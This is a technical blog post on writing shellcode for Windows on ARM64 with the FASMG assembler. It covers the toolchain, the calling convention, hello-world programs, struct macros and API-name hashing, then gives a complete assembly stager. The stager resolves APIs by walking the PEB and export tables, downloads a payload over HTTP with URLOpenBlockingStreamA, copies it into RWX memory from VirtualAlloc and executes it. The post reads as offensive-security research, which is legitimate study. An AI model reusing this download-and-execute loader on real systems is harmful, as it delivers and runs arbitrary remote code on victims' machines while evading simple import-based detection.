Shellcode: Windows on ARM64 / AArch64
2024-9-16 22:32:33 Author: modexp.wordpress.com

Introduction

Back in October 2018, I wanted to write ARM assembly on Windows. All I could acquire then was a Surface tablet running Windows RT that was released sometime in October 2012. Windows RT (now deprecated) was a version of Windows 8 designed to run on the 32-bit ARMv7 architecture. By the summer of 2013, it was considered a commercial flop.

For developers, it was possible to compile binaries on a separate machine and get them running on the tablet via USB stick or network, but unless you wanted to obtain a developer license, a jailbreak exploit was required. Since there were too many limitations, my attention shifted towards Linux on a Raspberry Pi 4.

From what I read, the release of Windows 10 for ARMv7 in 2015 was a distinct improvement over Windows RT. Limitations for developers persisted but at least Microsoft provided support for emulating x86 applications. Today, I finally have an ARM64 device running Windows 11 without all the problems that plagued previous versions. There’s full native support for developers with Visual Studio 2022 and a Linux subsystem that can run Ubuntu or Debian if you want to program ARM64 applications for Linux. (I know WSL isn’t new, but still). Best of all perhaps is the ability to emulate both 32-bit and 64-bit applications for the x86 architecture.

Toolchain

To support Windows on ARM, you have at least three options:

MSVC and LLVM-MinGW are best for C/C++. I prefer the GNU Assembler (as) over the ARM Macro Assembler (armasm64) shipped by Microsoft, but the main problem with both is the lack of support for macros. armasm64 supports most of the directives documented by ARM, but appears to have limitations. From what I can tell, ARMASM has no support for structures, which makes it very difficult to write programs in assembly. This is also a problem with the GNU Assembler, and the only way around it is to use symbolic names with the hardcoded offset of each field.

There is some hope. Despite having no direct support for the ARM architecture, flat assembler g (FASMG) by Tomasz Grysztar is an adaptable assembly engine that “has the ability to become an assembler for any CPU architecture.” There are include files for fasmg which implement ARM64 instructions using macros, and it’s what I decided to use for a simple PoC in this post.

Once you set up FASMG, copy the AARCH64 macros from asmFish to the include directory. My own batch file, which I execute from a command prompt inside the root directory of fasm, looks like this:

@echo off
set include=C:\fasmw\fasmg\packages\utility;C:\fasmw\fasmg\packages\x86\include
set path=%PATH%;C:\fasmw\fasmg\core

Tomasz has also provided an ARM64 example to get started.

Calling Convention

For subroutines, Windows uses the same calling convention as Linux. However, system calls are invoked differently: Linux passes the system call ID in x8, whereas Windows embeds the ID in the SVC instruction.

Register   Volatile?  Role
x0         Yes        Parameter/scratch register 1, result register
x1-x7      Yes        Parameter/scratch registers 2-8
x8-x15     Yes        Scratch registers. Used as parameter too.
x16-x17    Yes        Intra-procedure-call scratch registers
x18        No         Platform register: in kernel mode, points to KPCR for the current processor; in user mode, points to TEB
x19-x28    No         Scratch registers
x29/fp     No         Frame pointer
x30/lr     No         Link register
x31/xzr    No         Zero register

Hello, World! (Console)

Initially, I started working with ARMASM, so the following is just an example of how to create a simple console application.

    ; armasm64 hello.asm -ohello.obj
    ; cl hello.obj /link /subsystem:console /entry:start kernel32.lib

    AREA    .drectve, DRECTVE

    ; invoke API without repeating the same instructions
    ; p1 should be a free register available to load the address of the API
    MACRO
        INVOKE $p1, $p2          ; name of macro followed by its parameters
        adrp   $p1, __imp_$p2
        ldr    $p1, [$p1, __imp_$p2]
        blr    $p1
    MEND

    ; saves time typing "__imp_" for each API imported
    MACRO
        IMPORT_API $p1
        IMPORT __imp_$p1
    MEND

    AREA    data, DATA

Text    DCB "Hello, World!\n"

; symbolic constants for clarity
NULL equ 0
STD_OUTPUT_HANDLE equ -11

    ; the entrypoint
    EXPORT start

    ; the API used
    IMPORT_API ExitProcess
    IMPORT_API WriteFile
    IMPORT_API GetStdHandle

    ; start of code to execute
    AREA    text, CODE
start   PROC
    mov         x0, STD_OUTPUT_HANDLE
    INVOKE      x1, GetStdHandle

    mov         x4, NULL
    mov         x3, NULL
    mov         x2, 14     ; string length...
    adr         x1,Text
    INVOKE      x5, WriteFile

    mov         x0, NULL
    INVOKE      x1, ExitProcess
    
    ENDP
    END

And a simple GUI. A version for FASMG can be found here.

Hello, World! (GUI)

    ; armasm64 msgbox.asm -omsgbox.obj
    ; cl msgbox.obj /link /subsystem:windows /entry:start kernel32.lib user32.lib

    AREA    .drectve, DRECTVE

    ; invoke API without repeating the same instructions
    ; p1 should be the free register available to load address of API
    MACRO
        INVOKE $p1, $p2
        adrp   $p1, __imp_$p2
        ldr    $p1, [$p1, __imp_$p2]
        blr    $p1
    MEND

    ; saves time typing "__imp_" for each API imported
    MACRO
        IMPORT_API $p1
        IMPORT __imp_$p1
    MEND

    AREA    data, DATA

Text    DCB "Hello, World!", 0x0
Caption DCB "Hello from ARM64", 0x0

; symbolic names for clarity
NULL equ 0

    ; the entrypoint
    EXPORT start

    ; the API used
    IMPORT_API ExitProcess
    IMPORT_API MessageBoxA

    ; start of code to execute
    AREA    text, CODE
start   PROC
    mov         x3,NULL
    adr         x2,Caption
    adr         x1,Text
    mov         x0,NULL
    INVOKE      x4, MessageBoxA

    mov         x0, NULL
    INVOKE      x1, ExitProcess
    
    ENDP
    END

Symbolic Names

; The following are 64-Bit offsets.
TEB_ProcessEnvironmentBlock                  = 0x00000060
TEB_LastErrorValue                           = 0x00000068

PEB_Ldr                                      = 0x00000018
PEB_LDR_DATA_InLoadOrderModuleList           = 0x00000010

LDR_DATA_TABLE_ENTRY_DllBase                 = 0x00000030

IMAGE_DOS_HEADER_e_lfanew                    = 0x0000003C

IMAGE_EXPORT_DIRECTORY_Characteristics       = 0x00000000
IMAGE_EXPORT_DIRECTORY_TimeDateStamp         = 0x00000004
IMAGE_EXPORT_DIRECTORY_MajorVersion          = 0x00000008
IMAGE_EXPORT_DIRECTORY_MinorVersion          = 0x0000000A
IMAGE_EXPORT_DIRECTORY_Name                  = 0x0000000C
IMAGE_EXPORT_DIRECTORY_Base                  = 0x00000010
IMAGE_EXPORT_DIRECTORY_NumberOfFunctions     = 0x00000014
IMAGE_EXPORT_DIRECTORY_NumberOfNames         = 0x00000018
IMAGE_EXPORT_DIRECTORY_AddressOfFunctions    = 0x0000001C
IMAGE_EXPORT_DIRECTORY_AddressOfNames        = 0x00000020
IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals = 0x00000024

STATFLAG_DEFAULT = 0
STATFLAG_NONAME = 1
STATFLAG_NOOPEN = 2

STREAM_SEEK_SET	= 0
STREAM_SEEK_CUR	= 1
STREAM_SEEK_END	= 2
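
Hardcoded offsets are easy to get wrong, so it can help to cross-check them against the structure definition. The following is a minimal sketch in Python using ctypes, assuming the IMAGE_EXPORT_DIRECTORY layout from winnt.h; the helper name export_directory_offsets is made up for this illustration and is not part of the shellcode.

```python
import ctypes

class IMAGE_EXPORT_DIRECTORY(ctypes.Structure):
    # Field order and widths follow the winnt.h definition:
    # DWORD = c_uint32, WORD = c_uint16.
    _fields_ = [
        ("Characteristics",       ctypes.c_uint32),
        ("TimeDateStamp",         ctypes.c_uint32),
        ("MajorVersion",          ctypes.c_uint16),
        ("MinorVersion",          ctypes.c_uint16),
        ("Name",                  ctypes.c_uint32),
        ("Base",                  ctypes.c_uint32),
        ("NumberOfFunctions",     ctypes.c_uint32),
        ("NumberOfNames",         ctypes.c_uint32),
        ("AddressOfFunctions",    ctypes.c_uint32),
        ("AddressOfNames",        ctypes.c_uint32),
        ("AddressOfNameOrdinals", ctypes.c_uint32),
    ]

def export_directory_offsets():
    """Return {field name: byte offset} (hypothetical helper)."""
    return {name: getattr(IMAGE_EXPORT_DIRECTORY, name).offset
            for name, _ in IMAGE_EXPORT_DIRECTORY._fields_}

if __name__ == "__main__":
    # Print the offsets in the same style as the symbolic names.
    for name, offset in export_directory_offsets().items():
        print(f"IMAGE_EXPORT_DIRECTORY_{name:<22} = 0x{offset:08X}")
```

The same approach should work for any other structure whose fields are plain integers, but the TEB and PEB offsets are better confirmed against debugging symbols.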

Structures and Unions

FASMG provides macros for struct and union, similar to those supported by Borland’s Turbo Assembler or Microsoft’s Macro Assembler.

struct LARGE_INTEGER
    LowPart  dd ?
    HighPart dd ?
ends

struct ULARGE_INTEGER
    LowPart  dd ?
    HighPart dd ?
ends

struct GUID
    Data1 	dd ?
    Data2 	dw ?
    Data3 	dw ?
    Data4 	db 8 dup(?)
ends
    
struct STATSTG
    pwcsName          dq ?   ; LPOLESTR
    _type             dd ?   ; DWORD
    _padding          dd ?   ; padding for _type
    cbSize            ULARGE_INTEGER
    mtime             FILETIME    
    ctime             FILETIME  
    atime             FILETIME
    grfMode           dd ?
    grfLocksSupported dd ?
    clsid             GUID
    grfStateBits      dd ?
    reserved          dd ?
ends
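
To sanity-check a layout like STATSTG, including the explicit padding after the type field, the structure can be mirrored with ctypes. This is only a sketch: FILETIME is assumed to be two DWORDs as in the Windows SDK, the pointer is modelled as a 64-bit integer so the result does not depend on the host, and the field name type_ stands in for _type.

```python
import ctypes

class ULARGE_INTEGER(ctypes.Structure):
    _fields_ = [("LowPart", ctypes.c_uint32), ("HighPart", ctypes.c_uint32)]

class FILETIME(ctypes.Structure):
    # Assumption: two DWORDs, as declared in the Windows SDK.
    _fields_ = [("dwLowDateTime", ctypes.c_uint32),
                ("dwHighDateTime", ctypes.c_uint32)]

class GUID(ctypes.Structure):
    _fields_ = [("Data1", ctypes.c_uint32),
                ("Data2", ctypes.c_uint16),
                ("Data3", ctypes.c_uint16),
                ("Data4", ctypes.c_uint8 * 8)]

class STATSTG(ctypes.Structure):
    _fields_ = [
        ("pwcsName",          ctypes.c_uint64),  # LPOLESTR, 8 bytes on ARM64
        ("type_",             ctypes.c_uint32),  # DWORD
        ("_padding",          ctypes.c_uint32),  # keeps cbSize 8-byte aligned
        ("cbSize",            ULARGE_INTEGER),
        ("mtime",             FILETIME),
        ("ctime",             FILETIME),
        ("atime",             FILETIME),
        ("grfMode",           ctypes.c_uint32),
        ("grfLocksSupported", ctypes.c_uint32),
        ("clsid",             GUID),
        ("grfStateBits",      ctypes.c_uint32),
        ("reserved",          ctypes.c_uint32),
    ]

if __name__ == "__main__":
    print("sizeof(STATSTG) =", ctypes.sizeof(STATSTG))
    print("cbSize offset   =", STATSTG.cbSize.offset)
```

The offset of cbSize is what the shellcode later relies on when it reads Stg.cbSize.LowPart.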

COM Interfaces

The shellcode uses the IStream object to read data from the HTTP request. FASMG provides macros to declare an interface. There are also comcall and cominvk macros to invoke interface methods. I decided not to use them here. As pointed out before in relation to executing .NET assemblies, interfaces are just structures with function pointers.

struct IStreamVtbl
    ; IUnknown
    QueryInterface dq ?
    AddRef         dq ?
    Release        dq ?
    
    ; ISequentialStream
    Read           dq ?
    Write          dq ?
    
    ; IStream
    Seek           dq ?
    SetSize        dq ?
    CopyTo         dq ?
    Commit         dq ?
    Revert         dq ?
    LockRegion     dq ?
    UnlockRegion   dq ?
    Stat           dq ?
    Clone          dq ?
ends
          
struct IStream
    lpVtbl         dq ? ; pointer to IStreamVtbl
ends
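
Because the vtable is just an array of 8-byte function pointers, the offset of each method is its position in the declaration multiplied by 8. A small sketch, assuming the method order shown in IStreamVtbl above; the names ISTREAM_METHODS and vtable_offset are invented for this example.

```python
POINTER_SIZE = 8  # size of a function pointer on ARM64, in bytes

# Method order copied from the IStreamVtbl structure:
# IUnknown first, then ISequentialStream, then IStream.
ISTREAM_METHODS = [
    "QueryInterface", "AddRef", "Release",
    "Read", "Write",
    "Seek", "SetSize", "CopyTo", "Commit", "Revert",
    "LockRegion", "UnlockRegion", "Stat", "Clone",
]

def vtable_offset(method):
    """Return the byte offset of a method pointer inside the vtable."""
    return ISTREAM_METHODS.index(method) * POINTER_SIZE

if __name__ == "__main__":
    for name in ("Read", "Seek", "Stat"):
        print(f"IStreamVtbl.{name} = 0x{vtable_offset(name):02X}")
```

These are the values that expressions such as IStreamVtbl.Stat resolve to when the shellcode loads a method pointer before calling it.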

Local Variables

FASMG doesn’t support these out of the box. But what you can do is define a structure with your variables in it.

struct var_tbl
    pStream   IStream
    Stg       STATSTG
    liZero    LARGE_INTEGER
    BytesRead dq ?
    pCode     dq ?
ends

On entry to the program or a subroutine, subtract the size of the structure (rounded up to a multiple of 16) from the stack pointer.

    sub        sp, sp, ((sizeof.var_tbl + 15) and -16)

Then, when you need the address of a variable, it can be computed from its offset with the ADD instruction.

    ; x2 = &var_tbl.pStream
    add        x2, sp, var_tbl.pStream

To access the value stored in var_tbl.pStream:

    ; x2 = var_tbl.pStream
    ldr        x2, [sp, var_tbl.pStream]
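
The expression ((sizeof.var_tbl + 15) and -16) used to reserve stack space rounds the size up to the next multiple of 16, which keeps the stack pointer 16-byte aligned as AArch64 expects. A quick sketch of the same arithmetic in Python; the function name align_up is hypothetical.

```python
def align_up(size, alignment=16):
    """Round size up to the next multiple of alignment (a power of two)."""
    # Adding alignment - 1 pushes any partial block over the boundary,
    # and masking with -alignment clears the low bits again.
    return (size + alignment - 1) & -alignment

if __name__ == "__main__":
    for size in (1, 16, 100, 112, 113):
        print(size, "->", align_up(size))
```

Assuming the struct macros pack the fields without extra padding, var_tbl above would occupy 8 + 80 + 8 + 8 + 8 = 112 bytes, which is already a multiple of 16, so the expression leaves it unchanged.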

Macros

The most powerful feature of FASMG is its support for macros. It’s possible to implement cryptographic hashes like SHA256, SHA512 and SHA3 purely with macros. The following doesn’t demonstrate the full potential of FASMG at all.

macro hash_api dll_name, api_name
    local dll_hash, api_hash, b

    ; DLL 
    virtual at 0  
        db dll_name  
        dll_hash = 0  
        repeat $
            load b byte from % - 1  
            dll_hash = (dll_hash + b) and 0xFFFFFFFF
            dll_hash = ((dll_hash shr 8) and 0xFFFFFFFF) or ((dll_hash shl 24) and 0xFFFFFFFF) 
        end repeat  
    end virtual

    ; API
    virtual at 0  
        db api_name  
        api_hash = 0  
        repeat $
            load b byte from % - 1
            api_hash = (api_hash + b) and 0xFFFFFFFF
            api_hash = ((api_hash shr 8) and 0xFFFFFFFF) or ((api_hash shl 24) and 0xFFFFFFFF) 
        end repeat  
    end virtual

    dd (dll_hash + api_hash) and 0xFFFFFFFF
end macro
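
For checking the values the macro emits, the same add-then-rotate hash can be written in a few lines of Python. This is a sketch rather than part of the toolchain: the names ror32, hash_string and hash_api are chosen here for illustration, and the DLL name is lowercased the way the runtime loop in the shellcode does it, which the macro itself does not do (it expects a lowercase name).

```python
MASK32 = 0xFFFFFFFF

def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    value &= MASK32
    return ((value >> count) | (value << (32 - count))) & MASK32

def hash_string(text, lowercase=False):
    """Add each byte to the hash, then rotate right by 8."""
    h = 0
    for c in text.encode("ascii"):
        if lowercase and ord("A") <= c <= ord("Z"):
            c |= 0x20  # fold 'A'..'Z' to lowercase
        h = ror32((h + c) & MASK32, 8)
    return h

def hash_api(dll_name, api_name):
    """Combine the DLL hash and the API hash into one 32-bit value."""
    return (hash_string(dll_name, lowercase=True) + hash_string(api_name)) & MASK32

if __name__ == "__main__":
    for dll, api in (("kernelbase.dll", "LoadLibraryA"),
                     ("urlmon.dll", "URLOpenBlockingStreamA")):
        print(f"{dll}!{api} = 0x{hash_api(dll, api):08X}")
```

Only the API name is case sensitive here, so "KERNELBASE.dll" and "kernelbase.dll" produce the same combined hash.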

Thread Environment Block

xpr is an alias for the x18 register. As noted in the table of integer registers, it contains a pointer to the TEB for user-mode applications. Every offset used by AMD64 can probably be used for ARM64. However, it would be safer to check the debugging symbols.

System Calls

For x86, the syscall number is placed in the accumulator (EAX/RAX), but for ARM64 it’s embedded in the SVC opcode itself and there appears to be no alternative (at least not that I’m aware of). Building a new stub would require using NtAllocateVirtualMemory and manually encoding the instruction.
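
To illustrate what manually encoding the instruction involves: in the A64 encoding, SVC carries a 16-bit immediate in bits 5 to 20 of the opcode. The sketch below builds the bytes for a two-instruction stub, assuming the stub is simply SVC followed by RET; the function names and the syscall number in the usage line are placeholders, not real Windows values.

```python
import struct

SVC_BASE = 0xD4000001  # encoding of "svc #0"
RET_X30  = 0xD65F03C0  # encoding of "ret"

def encode_svc(number):
    """Return the 32-bit opcode for "svc #number"."""
    if not 0 <= number <= 0xFFFF:
        raise ValueError("SVC immediate must fit in 16 bits")
    return SVC_BASE | (number << 5)

def decode_svc(opcode):
    """Extract the immediate from an SVC opcode."""
    return (opcode >> 5) & 0xFFFF

def build_stub(number):
    """Return little-endian bytes for "svc #number; ret" (assumed stub shape)."""
    return struct.pack("<II", encode_svc(number), RET_X30)

if __name__ == "__main__":
    # 0x18 is an arbitrary example value, not a verified syscall ID.
    print(build_stub(0x18).hex())
```

Since the ID lives inside the opcode, every distinct system call needs its own encoded instruction, which is why a new stub has to be written to freshly allocated memory.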

HTTP Download

The following code uses URLOpenBlockingStream to download shellcode and execute it in memory.

start:
    ;brk        #0xF000
    
    sub        sp, sp, ((sizeof.var_tbl + 15) and -16)
    
    adr        x20, hash_tbl
    adr        x21, invoke_api

    ; LoadLibraryA("urlmon.dll")
    adr        x0, urlmon_name
    blr        x21
    cbz        x0, exit_shellcode
    
    ; hr = URLOpenBlockingStreamA(NULL, szUrl, &pStream, 0, 0);
    mov        x4, xzr
    mov        x3, xzr
    add        x2, sp, var_tbl.pStream
    adr        x1, url_path
    mov        x0, xzr           ; NULL
    blr        x21
    cbnz       x0, exit_shellcode
    
    ; STATSTG Stg;
    ; hr = pStream->Stat(&Stg, STATFLAG_NONAME);
    mov        x2, STATFLAG_NONAME
    add        x1, sp, var_tbl.Stg
    ldr        x0, [sp, var_tbl.pStream]
    ldr        x3, [x0, IStream.lpVtbl]
    ldr        x3, [x3, IStreamVtbl.Stat]
    blr        x3
    cbnz       x0, exit_shellcode    
    
    ; LARGE_INTEGER liZero = { 0 }; 
    ; hr = pStream->Seek(liZero, STREAM_SEEK_SET, NULL);
    mov        x3, xzr                ; NULL
    mov        x2, xzr                ; STREAM_SEEK_SET
    add        x1, sp, var_tbl.liZero
    str        xzr, [x1]
    mov        x1, xzr
    ldr        x0, [sp, var_tbl.pStream]
    ldr        x4, [x0, IStream.lpVtbl]
    ldr        x4, [x4, IStreamVtbl.Seek]
    blr        x4 
    cbnz       x0, exit_shellcode  
    
    ; pCode = VirtualAlloc(NULL, Stg.cbSize.LowPart, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    mov        x3, PAGE_EXECUTE_READWRITE
    mov        x2, MEM_COMMIT
    ldr        w1, [sp, var_tbl.Stg.cbSize.LowPart]
    mov        x0, NULL
    blr        x21
    cbz        x0, exit_shellcode  
    
    str        x0, [sp, var_tbl.pCode]
    
    ; hr = pStream->Read(pCode, Stg.cbSize.LowPart, &BytesRead);
    add        x3, sp, var_tbl.BytesRead
    ldr        w2, [sp, var_tbl.Stg.cbSize.LowPart]
    ldr        x1, [sp, var_tbl.pCode]
    ldr        x0, [sp, var_tbl.pStream]
    ldr        x4, [x0, IStream.lpVtbl]
    ldr        x4, [x4, IStreamVtbl.Read]
    blr        x4
    cbnz       x0, exit_shellcode  
    
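    ; execute the downloaded code
    ldr        x0, [sp, var_tbl.pCode]
    blr        x0
    
    ; ExitThread is the next entry in hash_tbl; x0 holds whatever the payload returned
    blr        x21
    cbz        x0, exit_shellcode 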
exit_shellcode:
    add        sp, sp, ((sizeof.var_tbl + 15) and -16)
    ret
    
invoke_api:
    ; save parameters, except for x0, which won't be used.
    stp        x1, x2, [sp, -64]!
    stp        x3, x4, [sp, 16]
    stp        x5, x6, [sp, 32]
    stp        x7, x8, [sp, 48]

    ; Ldr = (PPEB_LDR_DATA)NtCurrentTeb()->ProcessEnvironmentBlock->Ldr;
    mov        x1, x18 ; xpr
    ldr        x2, [x1, TEB_ProcessEnvironmentBlock]
    ldr        x2, [x2, PEB_Ldr]
    
    ; end = (PLIST_ENTRY)&Ldr->InLoadOrderModuleList;
    add        x2, x2, PEB_LDR_DATA_InLoadOrderModuleList
    ; nxt = end->Flink;
    ldr        x3, [x2]            ; read first entry
nxt_dll:
    cmp        x3, x2              ; while (nxt != end)
    bne        load_dll_loop
    add        sp, sp, 64          ; fixup stack
    ;ret                            ; return to caller
load_dll_loop:
    ; bx = e->DllBase 
    ldr        x4, [x3, LDR_DATA_TABLE_ENTRY_DllBase]         
    ldr        x3, [x3]            ; nxt = nxt->Flink
    
    ; nt = VA(PIMAGE_NT_HEADERS, bx, ((PIMAGE_DOS_HEADER)e->DllBase)->e_lfanew);
    ldr        w5, [x4, IMAGE_DOS_HEADER_e_lfanew]     
    add        x5, x4, w5, uxtw #0 
    
    ; va = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    ; if (!va) continue;
    ldr        w5, [x5, #0x88]     
    cbz        w5, nxt_dll         
    
    ; exp = VA(PIMAGE_EXPORT_DIRECTORY, bx, va);
    add        x5, x4, w5, uxtw #0 
    
    ; cnt = exp->NumberOfNames;
    ; if (!cnt) continue;
    ldr        w6, [x5, IMAGE_EXPORT_DIRECTORY_NumberOfNames]    
    cbz        w6, nxt_dll        
    
    ; dll = VA(PCHAR, bx, exp->Name);
    ldr        w7, [x5, IMAGE_EXPORT_DIRECTORY_Name]      
    add        x7, x4, w7, uxtw #0

    mov        w8, #0              ; dx = 0
hash_dll:
    ; while (*dll) c = *dll++, 
    ; c = (c >= 'A' && c <= 'Z') ? (c | 32) : c, dx += c, dx = R(dx, 8);
    ldrsb      x9, [x7], 1        
    cbz        x9, exit_hash_dll
    
    sub        x10, x9, 'A'
    orr        x11, x9, 32
    cmp        x10, 26
    csel       x9, x11, x9, cc
    add        w8, w8, w9
    ror        w8, w8, 8
    b          hash_dll
exit_hash_dll:
    ; aon = VA(PDWORD, bx, exp->AddressOfNames);
    ldr        w9, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNames]
    add        x9, x4, w9, uxtw #0
    mov        x10, #0
nxt_api:
    mov        x11, #0
    ; api = VA(PCHAR, bx, aon[i]);
    ldr        w12, [x9, w10, uxtw #2] 
    add        x12, x4, w12, uxtw #0
hash_api_loop:
    ; while (*api) ax += *api++, ax = R(ax, 8);
    ldrsb      x13, [x12], 1
    cbz        x13, exit_hash_api
    
    add        w11, w11, w13
    ror        w11, w11, 8
    b          hash_api_loop
exit_hash_api:
    add        w11, w11, w8    ; ax + dx
    ldr        w12, [x20]      ; load hash
    cmp        w11, w12        ; if ((ax + dx) == hx)
    beq        load_api
    
    add        w10, w10, 1     ; i++
    cmp        w10, w6         ; i < cnt
    bne        nxt_api
    b          nxt_dll
    
load_api:
    add        x20, x20, 4
    
    ; aof = VA(PDWORD, bx, exp->AddressOfFunctions);
    ldr        w1, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfFunctions]
    add        x1, x4, x1
    
    ; ono = VA(PDWORD, bx, exp->AddressOfNameOrdinals);
    ldr        w2, [x5, IMAGE_EXPORT_DIRECTORY_AddressOfNameOrdinals]  
    add        x2, x4, x2
    
    ; pfn = VA(PVOID, bx, aof[ono[i]]);
    ldrh       w2, [x2, w10, uxtw #1]  ; read ordinal
    ldr        w1, [x1, x2, lsl #2]    ; read address of function rva
    add        x9, x4, w1, uxtw #0     ; add base

    ; load parameters saved on stack
    ldp        x1, x2, [sp], 16
    ldp        x3, x4, [sp], 16
    ldp        x5, x6, [sp], 16
    ldp        x7, x8, [sp], 16
    
    ; execute API and return to original caller.
    br         x9   
hash_tbl:
    hash_api "kernelbase.dll", "LoadLibraryA"
    hash_api "urlmon.dll",     "URLOpenBlockingStreamA"
    hash_api "kernelbase.dll", "VirtualAlloc"
    hash_api "kernelbase.dll", "ExitThread"
urlmon_name:
    db "urlmon", 0
url_path:
    db "http://localhost:1234/notepad.arm64.bin", 0
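
One constant in the listing above has no symbolic name: the 0x88 used to read the export directory RVA from the NT headers. It can be derived from the PE32+ header sizes, as the sketch below shows. The constant and function names are made up for this example, and the sizes assume a 64-bit image (IMAGE_OPTIONAL_HEADER64).

```python
SIGNATURE_SIZE            = 4    # "PE\0\0"
FILE_HEADER_SIZE          = 20   # sizeof(IMAGE_FILE_HEADER)
DATA_DIRECTORY_OFFSET     = 112  # DataDirectory inside IMAGE_OPTIONAL_HEADER64
DATA_DIRECTORY_ENTRY_SIZE = 8    # VirtualAddress + Size, two DWORDs

IMAGE_DIRECTORY_ENTRY_EXPORT = 0
IMAGE_DIRECTORY_ENTRY_IMPORT = 1

def data_directory_offset(index):
    """Offset of DataDirectory[index].VirtualAddress from the NT headers."""
    return (SIGNATURE_SIZE + FILE_HEADER_SIZE + DATA_DIRECTORY_OFFSET
            + index * DATA_DIRECTORY_ENTRY_SIZE)

if __name__ == "__main__":
    print(hex(data_directory_offset(IMAGE_DIRECTORY_ENTRY_EXPORT)))
```

For a 32-bit image the data directory starts 16 bytes earlier in the optional header, so the same constant would not apply there.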

Further Reading


Source: https://modexp.wordpress.com/2024/09/16/windows_arm64/